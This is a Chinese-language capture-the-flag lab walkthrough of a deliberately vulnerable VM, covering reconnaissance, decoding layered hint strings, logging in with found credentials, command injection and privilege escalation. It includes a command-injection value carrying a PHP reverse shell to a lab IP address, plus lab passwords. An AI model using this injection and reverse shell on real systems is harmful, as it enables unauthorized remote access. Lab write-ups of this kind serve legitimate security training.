# 靶场搭建

下载直接导入,设置成 NAT 模式,就能用了

IP: 192.168.1.128

# 渗透过程

# 信息初收集

33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))

只有一个端口,web 服务,那就说明你懂得

打开 web 服务端先 F12 看到提示 <!--0x643239334c6d70775a773d3d-->

16 进制转字符,base64 解码得到 wow.jpg ,访问毛都没有啊

dirsearch 扫到了 images,再加上 wow.jpg ,出来个吊图,binwalk 了一下也没问题啊 ==、

正当我一筹莫展,猛回头,发现标题是 /Challenge ,拼接一下,哦 K 了家人,找到入口了

注入也不行,牛魔的这交互太卡了,感觉有问题。

加大收集强度,在 Challenge 上大字典: dirsearch -u http://192.168.1.128:33447/Challenge -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

无果

进一步收集信息,在前段源代码中发现了 forms.js ,能够查看到中间件的详细信息。

通过在互联网上搜索这个 peredur.net 在 github 中搜索到一组账号密码

Username	: test_user
Email		: [email protected]
Password	: 6ZaxN2Vzm9NUJT2y

登录后就是一个文件包含,尝试包含一些敏感文件,无果

查看源代码,发现底部有提示 0x5933566a4c6e4a34626e413d ,转换成字符串后 base64 解密,rot13 解密后逆向,得到提示 cake.php

┌──(root㉿kali)-[~]
└─# echo -n '0x5933566a4c6e4a34626e413d' | xxd -r -p | base64 -d | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev
cake.php

进去发现是个提示,标题是 /Magic_Box ,扫一下

# shell

发现 RCE: http://192.168.1.128:33447/Challenge/Magic_Box/command.php

直接反弹 shell: www.baidu.com;php -r '$sock=fsockopen("192.168.1.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# 提权

寻找可以利用的文件,收集 acid 用户的文件时发现了两个点,一个是 chkrootkit 在 pwn_me 文件夹下,感觉可以利用,用 msf 搞了一下,好像没什么戏。

还发现一个 hint_pcapng 流量包,下载下来查看一下 tcp 流。发现 saman 密码 1337hax0r

su 过去,sudo 拿到 root 权限

# 小结

偏 CTF,绕的一 B